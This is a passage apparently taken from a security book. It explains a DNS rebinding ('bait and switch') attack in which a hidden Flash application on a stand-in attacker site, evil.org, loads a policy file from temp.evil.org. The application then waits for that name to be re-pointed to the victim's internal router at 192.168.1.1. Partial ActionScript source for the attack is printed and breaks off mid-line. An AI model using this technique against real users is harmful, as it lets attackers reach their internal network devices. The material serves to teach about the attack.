Suppose a victim visits evil.org to see some pictures of cute kittens. The victim types
in evil.org and presses enter. The browser and operating system go to evil.org??™s DNS
server, perform a DNS query, and get the IP address 1.1.1.3 with a long TTL. The IP
address for evil.org will not change in this example.
Next, the browser downloads many things from evil.org, such as an HTML page,
images of cute kittens, and a hidden Flash application. The bait and switch is done with
temp.evil.org within the hidden Flash application whose source is shown here:
import flash.net.*;
class DnsPinningAttackApp {
static var app:DnsPinningAttackApp;
static var sock:Socket;
static var timer:Timer;
function DnsPinningAttackApp() {
// Step 1: The Bait
// This request is sent to 1.1.1.3
flash.system.Security.loadPolicyFile("http://temp.evil.org/"
+ "MyOpenCrossDomainPolicy.xml");
// Step 2: The Switch
// Wait 5 seconds to ensure that Flash loaded the security policy
// correctly and this program can talk to temp.evil.org.
// Wait another 5 seconds for the DNS server for temp.evil.org to
// change from 1.1.1.3 to 192.168.1.1.
// Run connectToRouter() in 10 seconds.
timer = new Timer(5000+5000, 1);
timer.
Pages:
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417